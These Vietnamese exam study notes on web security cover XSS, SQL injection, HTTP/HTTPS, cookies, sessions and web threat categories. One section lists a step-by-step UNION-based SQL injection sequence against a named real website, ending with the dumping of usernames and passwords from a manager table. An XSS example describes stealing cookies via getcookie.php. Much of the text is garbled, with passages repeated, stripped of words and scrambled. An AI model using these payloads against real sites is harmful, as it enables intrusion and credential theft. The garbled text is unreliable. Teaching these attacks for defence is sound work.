Câu 1:Nêu kiến thức căn bản về tấn công XSS.Nêu 1 ví dụ đơn giản. Đề xuấtphương án phòng chống.XSS: Cross Site Scripting – kịch bản liên trang, là một trong kĩ thuật tấncông phổ biến nhất hiện nay, đồng thời nó cũng là một trong những vấn đề bảo mậtquan trọng đối với các nhà phát triển web và cả những người sử dụng web.XSS được biết đến lần đầu năm 2002. Bất kì một website nào cho phépngười sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguyhiểm thì đều tiềm ẩn các lỗi XSSXSS là một kỹ thuật tấn công bằng cách chèn vào các website động (ASP,PHP, …) những thẻ HTML hay những đoạn mã nguy hiểm có thể gây nguy hạicho những người sử dụng khác. Những đoạn mã nguy hiểm thường được viết bằngClient site script như javaScript, JscriptPhân loại:Stored XSS: là hình thức tấn công mà ở đó cho phép kẻ tấn công có thể chènmột đoạn script nguy hiểm (thường là Javascript) vào website của chúng ta thôngqua một chức năng nào đó (vd: viết lời bình, guestbook, gửi bài..), để từ đó khi cácthành viên khác truy cập website sẽ bị dính mã độc từ kẻ tấn công này, các mã độcnày thường được lưu lại trong database của website chúng ta nên gọi là Stored.Stored XSS phát sinh do chúng ta không lọc dữ liệu do thành viên gửi lên một cáchđúng đắn, khiến cho mã độc được lưu vào Database của website. Truy vấn để đượclưu lâu dài trên server.Reflected XSS: được thực hiện và có hiệu lực trong một cặp truy vấn và phản hồi HTTP; Là dạng tấn công không có trạng thái, tức là kết quả truy vấn tiếp theo sẽ không phụ thuộc vào các truy vấn trước đó. Kịch bản của tấn công này thường yêu cầu nạn nhân phải nhấn chuột vào một đường liên kết được chuẩn bị trước bởi kẻ tấn công.Hiểm hoạ tấn công XSS:+ Đánh cắp cookies+ Tấn công lừa đảo+ Sử dụng trình duyệt như là công cụ quét cổng trong mạng LAN+ ....Cách phòng chốngPhát hiện và vô hiệu hóa các đoạn mã độc.Chỉ chấp nhận những dữ liệu hợp lệ.Từ chối nhận các dữ liệu hỏng.Liên tục kiểm tra và thanh lọc dữ liệuTạo ra danh sách những thẻ HTML được phép sử dụng, xóa bỏ thẻ hoặc đóng các thẻ Script trong thẻ coi đoạn Script đó như là một đoạn trích dẫn thôi.Lọc ra bất kì một đoạn mã JavaScriptJavaVBScriptActiveX
Câu 1:Nêu kiến thức công XSS.Nêu ví dụ đơn giản Đề xuất phương án phòng chống - XSS: Cross Site Scripting – kịch liên trang, kĩ thuật công phổ biến nay, đồng thời vấn đề bảo mật quan trọng nhà phát triển web người sử dụng web - XSS biết đến lần đầu năm 2002 Bất kì website cho phép người sử dụng đăng thông tin mà kiểm tra chặt chẽ đoạn mã nguy hiểm tiềm ẩn lỗi XSS - XSS kỹ thuật công cách chèn vào website động (ASP, PHP, …) thẻ HTML hay đoạn mã nguy hiểm gây nguy hại cho người sử dụng khác Những đoạn mã nguy hiểm thường viết Client site script javaScript, Jscript Phân loại: - Stored XSS: hình thức công mà cho phép kẻ công chèn đoạn script nguy hiểm (thường Javascript) vào website thông qua chức (vd: viết lời bình, guestbook, gửi ), để từ thành viên khác truy cập website bị dính mã độc từ kẻ công này, mã độc thường lưu lại database website nên gọi Stored Stored XSS phát sinh không lọc liệu thành viên gửi lên cách đắn, khiến cho mã độc lưu vào Database website Truy vấn để lưu lâu dài server - Reflected XSS: thực có hiệu lực cặp truy vấn phản hồi HTTP; Là dạng công trạng thái, tức kết truy vấn không phụ thuộc vào truy vấn trước Kịch công thường yêu cầu nạn nhân phải nhấn chuột vào đường liên kết chuẩn bị trước kẻ công Hiểm hoạ công XSS: + Đánh cắp cookies + Tấn công lừa đảo + Sử dụng trình duyệt công cụ quét cổng mạng LAN + - Cách phòng chống Phát vô hiệu hóa đoạn mã độc Chỉ chấp nhận liệu hợp lệ Từ chối nhận liệu hỏng Liên tục kiểm tra lọc liệu Tạo danh sách thẻ HTML phép sử dụng, xóa bỏ thẻ đóng thẻ Script thẻ coi đoạn Script - đoạn trích dẫn Lọc đoạn mã JavaScript/Java/VBScript/ActiveX/Flash Related Lọc dấu nháy đơn hay kép Lọc ký tự Null Xóa kí tự “ > ”, “ < ” Ngoài ra, công XSS phòng tránh nhờ vào công tác kiểm thử kiểm duyệt mã nguồn Ví dụ: Khi người dùng đưa trỏ qua ảnh, cookie trình duyệt web người dùng gửi getcookie.php Câu Hãy trình bày số kỹ thuật sử dụng phương pháp SQL injection Nêu số phương pháp phòng chống - Kỹ thuật khai thác liệu thông qua toán tử Union Toán tử Union toán tử cho phép ghép nối kết hai hay nhiều truy vấn sử dụng toán tử Select với Select column1,column2,…,column from table1 UNION Select column1,column2,…,column from table2 Khai thác thông tin thông qua việc sử dụng UNION nhánh việc khai thác liệu thông qua lỗi SQL Injection Các điểm yếu SQL Injection khai thác thông qua Union dạng điểm yếu mà thông tin trả hiển thị trực tiếp thông điệp phản hồi Toán tử union thực ghép liệu truy vấn gốc truy vấn khai thác Điều kiện hai truy vấn phải trả số cột, cột có kiểu liệu Kỹ thuật thực sau: - Tìm số cột truy vấn gốc Tìm cột yếu để khai thác thông tin Xác định tên CSDL, phiên bản, người dùng Tìm tên bảng CSDL Tìm ghi CSDL Kỹ thuật khai thác thông qua câu lệnh điều kiện Ý tưởng: Khiến cho DBMS trả trạng thái khác phụ thuộc vào điều kiện đưa ra.Mỗi truy vấn dựa vào điều kiện có dạng câu lệnh điều kiện ngôn ngữ lập trình thông thường, tức có dạng: IF điều_kiện THEN chuỗi_xử_lý_đúng ELSE chuỗi_xử_lý_sai Có vài mô hình nghiên cứu sử dụng để phân biệt kết hai trường hợp như: - Mô hình dựa nội dung phản hồi: dựa khác biệt nội dung phản hổi trường hợp dùng làm chuẩn so với trường hợp thăm dò tương đồng để tìm thông tin cần tìm - Mô hình dựa độ trễ phản hồi:Dựa khác biệt thời gian nhận phản hồi từ DBMS Sử dụng hàm WAITFOR DELAY SLEEP để kiểm tra - Kỹ thuật khai thác liệu với Blind SQL Injection Điều kiện:Các thông tin khai thác không trình bày trực tiếp nội dung phản hồi từ DBMS Blind SQL Injection dựa vào việc sử dụng mệnh đề điều kiện để thực suy luận thông tin cần khai thác.Cụ thể sd thông tin khai thác làm mệnh đề điều kiện sử dụng phương pháp khác để đánh dấu trường hợp đúng/sai mệnh đề - Kỹ thuật vượt qua lọc tham số đầu vào Hiện nhà phát triển ứng dụng web áp dụng nhiều biện pháp công cách: xây dựng lọc nhiều cấp, tường lửa web,các hệ thống ngăn chặn xâm nhập… Tuy có nhiều lọc bị vượt qua.Một số cách hacker thực như: - Lợi dụng khác ký tự in thường in hoa Sử dụng SQL comment thay dấu cách Sử dụng URL encoding Sử dụng phép biến đổi sâu ký tự Sử dụng byte NULL Cách phòng chống - Ở mức xây dựng ứng dụng Việc đảm bảo an toàn thông tin cho hệ thống triển khai theo nguyên tắc phòng thủ theo chiều sâu Bắt đầu từ việc đảm bảo an toàn viết mã nguồn, cấu hình an toàn cho máy chủ CSDL, DBMS, triển khai công cụ tường lửa Điểm yếu SQL Injection sử lý liệu người dùng không tốt Có số nguyên tắc cần tuân thủ xây dựng ứng dụng web: - Làm liệu đầu vào: Lọc liệu đầu vào sử dụng hai mô hình • Mô hình danh sách cho phép- whitelist:liệt kê danh sách liệu đầu vào hợp lệ • Mô hình danh sách cấm-blacklist: mô hình xây dựng lên mẫu đầu vào cho nguy hiểm không chấp nhận mẫu này(%, ,\*,*/,_,[,@ ) - Xây dựng truy vấn cho mô hình tham số hóa: mô hình xây dựng truy vấn sử dụng để thay mô hình truy vấn động Với mục đích xây dựng lần, dùng nhiều lần( lần cần thay đổi tham số, tham số truyền vào lúc thực thi) Mô hình tham số thực câu lệnh DML(select, insert, replace, update), create table câu lệnh khác chưa hỗ trợ - Chuẩn hóa liệu: Mã hóa liệu đầu vào định dạng gửi cho ứng dụng mà sau liệu giải mã theo định dạng mà kẻ công mong muốn - Ở mức tảng hệ thống Sử dụng chế lọc bổ sung như: Sử dụng tường lửa Web, sử dụng hệ thống pháp ngăn chặn xâm nhập, sd tường lửa CSDL…Tăng cường cập nhật vá, hạn chế tối đa quyền người dùng, sử dụng mật mã để bảo vệ liệu… Câu Hãy trình bày phương pháp công XSS.Ví dụ Nêu số phương pháp phòng chống Xét từ phía kẻ công, trình thực công XSS trải qua bước sau: B1:Mở website mục tiêu xác định vị trí nhập liệu B2:Xác định khả website mục tiêu có chứa lỗi XSS B3:Chèn mã vào vị trí có khả chứa lỗi B4: Khai thác XSS chia thành loại: - Stored XSS: (lý thuyết câu 1) - Reflected XSS(lý thuyết câu 1) Có nhiều hướng để khai thác thông qua lỗi Reflected XSS, cách biết đến nhiều chiếm phiên làm việc (session) người dùng, từ truy cập liệu chiếm quyền họ website Cách phòng chống câu 1; Câu Trình bày kiến thức phương pháp công SQL Injection Ví dụ kỹ thuật công sử dụng toán tử Union SQL Injection kĩ thuật cho phép kẻ công thi hành câu lệnh truy vấn SQL bất hợp pháp (người phát triển không lường trước được) cách lợi dụng lỗ hổng việc kiểm tra liệu nhập từ ứng dụng web Hậu tai hại cho phép kẻ công có toàn quyền, hiệu chỉnh… SQL Injection cho phép kẻ công thực thao tác delete, insert, update…trên CSDL ứng dụng, chí server mà ứng dụng chạy Lỗi SQL Injection thường sảy ứng dụng web có dlieu quản lý DBMS sql server, my Sql, DB2… - Một số phương pháp (kỹ thuật) công SQL Injection + Kỹ thuật khai thác liệu thông qua toán tử UNION + Kỹ thuật khai thác thông qua câu lệnh điều kiện + Kỹ thuật khai thác liệu với Blind SQL Injection + Kỹ thuật vượt qua lọc tham số đầu vào - Ví dụ công SQL Injection sử dụng toán tử UNION: http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1’ http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1 union all select 1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19, 20 http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1 union all select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19, 20 from information_schema.tables limit 20,1 http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1 union all select 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14,15,16,17,18,19, 20 from information_schema.tables where table_schema=database() http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1 union all select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x6d616e61676572 http://www.etron.com/en/products/u3hc_detial.php?Product_ID=1%20union all select 1,2,3,4,5,6,7,group_concat(UserName,0x7c,Password),9,10,11,12,13,14,15,16,17,18,19, 20 from manager -(Các em ý phải giải thích rõ bước, ví dụ như: dòng thêm dấu nháy vào sau 1, hệ thống báo lỗi ta thực tiếp bước sau; Dòng 2: tìm số cột mệnh đề select phía trước toán tử UNION không báo lỗi khác số cột, Các em phải diễn đạt trình bày bước.) Câu Anh chị nêu khác biệt HTTP & HTTPS.Nêu số phương thức http thông dụng, phân biệt phương thức get, post HTTP (HyperText Transfer Protocol)- giao thức truyền tải siêu văn Là giao thức yếu để web client web server giao tiếp với nhau.Nó giao thức tầng ứng dụng giao thức TCP/IP.Hoạt động theo mô hình dựa thông điệp( message-based model),là giao thức không trạng thái(không có chế ghi nhớ kết truy vấn trước, thực truy vấn sau.) HTTPS viết tắt “Hypertext Transfer Protocol Secure” Khi sử dụng giao thức HTTPS truy vấn HTTP phản hồi HTTP hoàn toàn thay đổi, có thay đổi tầng bên dưới, liệu truyền tải giao thức SSL Khi sử dụng giao thức http, liệu truyền dạng rõ Còn https liệu truyền tải dạng chuỗi mã hóa thông qua giao thức giao vận an toàn TLS/SSL(Transport Layer Security/Security Socket Layer) - Một số phương thức HTTP thông dụng: Giao thức HTTP quy định nhiều phương thức truy vấn khác Phổ biến GET POST Ngoài ra, có HEAD,TRACE,OPTIONS,PUT - Phân biệt GET, POST • GET: sử dụng để yêu cầu tài nguyên Dữ liệu gửi tường minh, tham số có ghi URL truy vấn Các URL bị đánh dấu để dùng lại, lưu lịch sử duyệt web, gửi tới server bên • POST: sử dụng để thực hành động Các tham số truyền qua URL qua thân truy vấn Các tham số truyền thân truy vấn không bị lưu lại ký hiệu đánh dấu, lịch sử duyệt web không bị thể tiêu đề referer => Phương thức POST cần dùng thay cho GET cần gửi thông tin nhạy cảm đến Web Server Câu 6.Nêu khái niệm chức cookie session Cookie Cookie: phần thiết yếu giao thức HTTP sử dụng đa số phần ứng dụng web Cookie chế để web server gửi liệu khác tới web client; web client lưu trữ giá trị sau tự động đệ trình trở lại web server thực truy vấn Web server thiết lập giá trị cookie thông qua tiêu đề: Set-Cookie phản hồi HTTP Cookie bao gồm nhiều cặp name=“value” , cặp cách dấu chấm phẩy “;” viết nhiều dòng Web client đệ trình cookie thông qua tiêu đề Cookie Tất cặp “name=value” đệ trình dòng phân tách dấu chấm phẩy “;” Một số thuộc tính quy định việc sử dụng cookie web client: Expires, Domain, Secure, HttpOnly, Path, Session - Không phải thành phần giao thức HTTP Session cách đơn giản để lưu trữ biến khiến biến sử dụng người dùng duyệt từ webpage sang webpage khác - Session tạo tồn server, sử dụng xuyên suốt từ truy vấn sang truy vấn khác, có yêu cầu xoá hết thời hạn có hiệu lực - Session biến mà tập hợp mở rộng biến lưu file với tên ngẫu nhiên - Mỗi session xá định định danh gọi Session ID Câu Nêu số hiểm họa an toàn web.Nêu ví dụ hiểm họa an toàn web mà gặp trình xd uwd web an toàn … Nhóm hiểm họa xác thực Đó công lên phương pháp xác thực mà ứng dụng web sử dụng để xác thực người dùng, dịch vụ hay ứng dụng khác.Trong trường hợp ứng dụng web, việc xác thực người dùng thường thực mật Khi đó, có hiểm họa an toàn sau: -Hiểm họa dò mật - Hiểm hoạ sử dụng lược đồ xác thực không đủ mạnh - Hiểm hoạ khôi phục mật không an toàn Nhóm hiểm họa trao quyền Đó công lên phương pháp web server sử dụng để xác định xem người dùng có trao quyền thực hành động hay không Các hiểm họa an toàn thông tin liên quan đến chế trao quyền gồm: - Hiểm họa bị đoán biết định danh phiên làm việc - Hiểm hoạ sử dụng chế phân quyền không an toàn - Hiểm hoạ không giới hạn thời gian có hiệu lực phiên làm việc - Hiểm hoạ gán ghép định danh phiên làm việc Nhóm hiểm họa công lên máy khách Những công tác động lên máy người dùng web Máy chủ không thiệt hại trường hợp Khi người dùng duyệt website thường không nghĩ đến việc bị công website Lợi dụng lòng tin kẻ ác ý sử dụng phương pháp khác để công lên máy người dùng - Hiểm hoạ thực thi kịch liên trang - Hiểm hoạ giả mạo nội dung - Hiểm hoạ phân tách phản hồi HTTP Nhóm hiểm họa thực thi câu lệnh Đây công khác nhằm thực thi câu lệnh web server Nếu web server chế an toàn đủ mạnh kẻ công làm thay đổi câu lệnh nhằm đạt mục đích định - Hiểm họa tràn đệm - Hiểm họa công lên chuỗi định dạng - Hiểm họa chèn câu lệnh LDAP - Hiểm họa thực thi câu lệnh hệ điều hành - Hiểm họa chèn câu lệnh SQL - Hiểm họa chèn mã kịch phía máy chủ - Hiểm họa chèn câu lệnh Xpath Nhóm hiểm họa làm lộ thông tin Các công thuộc nhóm thực nhằm mục đích thu thập thông tin ứng dụng web - Hiểm họa duyệt thư mục - Hiểm hoạ định danh ứng dụng - Hiểm hoạ rò rỉ thông tin - Hiểm hoạ đường dẫn ngược - Hiểm hoạ đoán biết vị trí tài nguyên Nhóm hiểm họa công logic Các công thuộc nhóm nhằm vào việc khai thác tính logic hoạt động ứng dụng web - Hiểm họa sử dụng tính cách ác ý - Hiểm họa từ chối dịch vụ - Hiểm họa kiểm tra người/máy bất thành - Hiểm họa kiểm tra tiến trình bất thành Câu 8.Trình bày cấu trúc truy vấn http phẩn hồi http Truy vấn http Thông điệp truy vấn HTTP chứa dòng truy vấn (request line) nhiều dòng tiêu đề (header line), dòng tiêu đề ghi dòng Sau tiêu đề phần thân (body) thông điệp (phần thân có không) Nếu có phân tách với phần header dòng trống Dòng (tiêu đề thứ nhất) bắt buộc.Tiêu đề có ba phần, phân cách dấu cách - Phần thứ nhất:cho biết phương thức truy vấn Phần thứ hai: URL yêu cầu Phần thứ ba: cho biết phiên giao thức HTTP mà web client sử dụng Ngoài ra, có số tiêu đề đáng quan tâm như: Tiêu đề referrer cho biết điểm xuất phát truy vấn tiêu đề Cookie dung để đệ trình tham số mà giá trị chúng web server gửi cho web client trước Tiếp theo tiêu đề phần thân( có không) Phản hồi http Là thông điệp mà web server trả lời cho truy vấn từ web client Bao gồm phần tiêu đề phần thân.Phần thân phân tách với phần tiêu đề dòng trống Một phản hồi http điển hình có dạng sau: Dòng phản hổi http bao gồm ba phần phân tách với dấu cách: - Phần thứ nhất: Cho biết phiên giao thức http sử dụng Phiên tất nhiên không phiên mà web client yêu cầu truy vấn - Phần thứ hai: Mã kết truy vấn Phần thứ ba:là chuỗi ký tự mô tả trạng thái phản hồi, thường lời giải thích cho mã kết truy vấn Hầu hết phản hồi http có phần thân Nội dung tiêu đề Conten-Type cho biết định dạng liệu phần thân Tiêu đề Content-Length: Cho biết độ dài phần thân phản hồi Tiêu đề Set-Cookie : thiết lập cookie cho web client Câu Trình bày mô hình , cấu trúc thực thể WWW? Phân biệt website, webpage, webapplication World Wide web thức xuất Internet vào năm 1991 Có thể nói cách mạng Internet nhờ mà người ta truy cập trao đổi thông tin cách dễ dàng Mặc dù đời muộn so với Internet, nhờ web mà Internet trở nên phổ biến ngày Nhiệm vụ ban đầu Web cung cấp thông tin, liệu cách nhanh chóng, thuận tiện từ người có đến người cần Cùng với phát triển khoa học công nghệ, bên cạnh việc cung cấp thông tin, liệu ngày web cung cấp dịch vụ(dịch vụ tin học văn phòng trực tuyến dịch vụ thư điện tử… đóng vai trò môi trường thực giao dịch thương mại Nói đến web không nói đến khái niệm webpage, website, web application, web server, web client web browser Web server(Máy chủ web) thường dùng với nghĩa Nghĩa thứ tính (hoặc cụm tính) vật lý mà website hoạt động Nghĩa thứ để phần mềm(vd appche, IIS) chạy máy chủ web vật lý, tương tác trực tiếp với web client, đóng vai trò trung gian web client website Web client (máy khách web) dung với nghĩa Nghĩa thứ nhấp tính vật lý mà từ đố người dung truy cập tới website Nghĩa thứ hài pahaanf mềm chạy máy khách web lý thay mặt người dùng gửi truy vấn tới web server hiển thị kết mà web server trả Thông thường web client web brower(Trình duyệt web) Firefox, Chrome, IE…nhưng có web client web browser, xây dựng với mục đích đặc biệt ví dụ để tải website mà không hiển thị chúng, ví dụ TeleportPro, Httrack Webpage: toàn nội dung hiển thị trình duyện web duyệt địa định Nội dung webpage thường xác định URL mà người dùng yêu cầu Tuy nhiên điều mang tính tương đối Ngày nay, phần lớn website xây dựng công nghẹ web động Khi đó, điều kiện khác nhau, URL ứng với nội dung khác Điều kiện là: thời điểm duyệt web, tài khoản sử dụng để duyệt web, thao tác mà người dùng sử dụng trình duyệt web… Website tập hợp trang webpage có chung tên miền sở Ví dụ: http://example.com/index.php http:/example.com/private/admin.php Về nội dung, website chứa nhiều thông tin dành cho nhiều người dùng cho nhiều mục đích nhu cầu khác Web application : trình ứng dụng mà tiếp cận qua web thông qua mạng Internet hay intranet Ứng dụng web phổ biến nhờ vào có mặt vào nơi đâu chương trình Khả cập nhật bảo trì ứng dụng Web mà phân phối cài đặt phần mềm hàng ngàn máy tính lý cho phổ biến Ứng dụng web dùng để thực Webmail, bán hàng trực tuyến, đấu giá trực tuyến, wiki, diễn đàn thảo luận, Weblog, MMORPG, Hệ quản trị nội dung, Phần mềm quản lý nguồn nhân lực nhiều chức khác [...]... truy vấn này sang truy vấn khác, chỉ mất đi khi có yêu cầu xoá nó hoặc hết thời hạn có hiệu lực - Session không phải là 1 biến mà là một tập hợp có thể mở rộng của các biến được lưu trong 1 file với tên ngẫu nhiên - Mỗi session được xá định bởi 1 định danh gọi là Session ID Câu 7 Nêu một số hiểm họa an toàn web. Nêu 2 ví dụ về hiểm họa an toàn web mà đã gặp trong quá trình xd uwd web an toàn … 1 Nhóm... khái niệm webpage, website, web application, web server, web client và web browser Web server(Máy chủ web) thường được dùng với 2 nghĩa Nghĩa thứ nhất là chỉ mấy tính (hoặc cụm mấy tính) vật lý mà trên đó website hoạt động Nghĩa thứ 2 là để chỉ phần mềm(vd như appche, IIS) chạy trên máy chủ web vật lý, tương tác trực tiếp với web client, đóng vai trò trung gian giữa web client và website Web client... thực thi câu lệnh trên web server Nếu web server không có cơ chế an toàn đủ mạnh thì kẻ tấn công có thể làm thay đổi những câu lệnh như thế nhằm đạt được những mục đích nhất định - Hiểm họa tràn bộ đệm - Hiểm họa tấn công lên chuỗi định dạng - Hiểm họa chèn câu lệnh LDAP - Hiểm họa thực thi câu lệnh hệ điều hành - Hiểm họa chèn câu lệnh SQL - Hiểm họa chèn mã kịch bản phía máy chủ - Hiểm họa chèn câu lệnh... client (máy khách web) cũng có thể dung với 2 nghĩa Nghĩa thứ nhấp là chỉ mấy tính vật lý mà từ đố người dung truy cập tới các website Nghĩa thứ hài là chỉ pahaanf mềm chạy trên máy khách web vậy lý thay mặt người dùng gửi các truy vấn tới web server và hiển thị kết quả mà web server trả về Thông thường web client là các web brower(Trình duyệt web) như Firefox, Chrome, IE…nhưng cũng có những web client không... server sử dụng để xác định xem người dùng có được trao quyền thực hiện một hành động nào đó hay không Các hiểm họa an toàn thông tin liên quan đến cơ chế trao quyền gồm: - Hiểm họa bị đoán biết định danh phiên làm việc - Hiểm hoạ sử dụng cơ chế phân quyền không an toàn - Hiểm hoạ không giới hạn thời gian có hiệu lực của phiên làm việc - Hiểm hoạ gán ghép định danh phiên làm việc 3 Nhóm hiểm họa tấn công... công nghẹ web động Khi đó, trong những điều kiện khác nhau, một URL sẽ ứng với nội dung khác nhau Điều kiện ở đây có thể là: thời điểm duyệt web, tài khoản được sử dụng để duyệt web, các thao tác mà người dùng sử dụng trong quá trình duyệt web Website là tập hợp các trang webpage có chung tên miền cơ sở Ví dụ: http://example.com/index.php http:/example.com/private/admin.php Về nội dung, website có thể... cầu khác nhau Web application : một trình ứng dụng mà có thể tiếp cận qua web thông qua mạng như Internet hay intranet Ứng dụng web phổ biến nhờ vào sự có mặt vào bất cứ nơi đâu của một chương trình Khả năng cập nhật và bảo trì ứng dụng Web mà không phải phân phối và cài đặt phần mềm trên hàng ngàn máy tính là lý do chính cho sự phổ biến của nó Ứng dụng web được dùng để hiện thực Webmail, bán hàng trực... client không phải là web browser, được xây dựng với mục đích đặc biệt ví dụ để tải website về mấy mà không hiển thị chúng, ví dụ như TeleportPro, Httrack Webpage: là toàn bộ nội dung hiển thị trên trình duyện web khi duyệt một địa chỉ nhất định Nội dung của webpage thường được xác định bởi URL mà người dùng yêu cầu Tuy nhiên điều này chỉ mang tính tương đối Ngày nay, một phần lớn các website được xây dựng... thiết lập cookie mới cho web client Câu 9 Trình bày mô hình , cấu trúc các thực thể trên bộ WWW? Phân biệt website, webpage, webapplication World Wide web chính thức xuất hiện trên Internet vào năm 1991 Có thể nói đấy là một cuộc cách mạng trên Internet vì nhờ đó mà người ta có thể truy cập trao đổi thông tin một cách dễ dàng Mặc dù ra đời khá muộn so với Internet, nhưng chính nhờ web mà Internet đã trở... ứng dụng web sử dụng để xác thực người dùng, dịch vụ hay ứng dụng khác.Trong trường hợp ứng dụng web, việc xác thực người dùng thường được thực hiện bằng mật khẩu Khi đó, có những hiểm họa an toàn như sau: -Hiểm họa dò mật khẩu - Hiểm hoạ sử dụng lược đồ xác thực không đủ mạnh - Hiểm hoạ khôi phục mật khẩu không an toàn 2 Nhóm hiểm họa trao quyền Đó là những tấn công lên các phương pháp được web server ... định danh gọi Session ID Câu Nêu số hiểm họa an toàn web. Nêu ví dụ hiểm họa an toàn web mà gặp trình xd uwd web an toàn … Nhóm hiểm họa xác thực Đó công lên phương pháp xác thực mà ứng dụng web. .. tới website Nghĩa thứ hài pahaanf mềm chạy máy khách web lý thay mặt người dùng gửi truy vấn tới web server hiển thị kết mà web server trả Thông thường web client web brower(Trình duyệt web) ... Hiểm họa bị đoán biết định danh phiên làm việc - Hiểm hoạ sử dụng chế phân quyền không an toàn - Hiểm hoạ không giới hạn thời gian có hiệu lực phiên làm việc - Hiểm hoạ gán ghép định danh phiên làm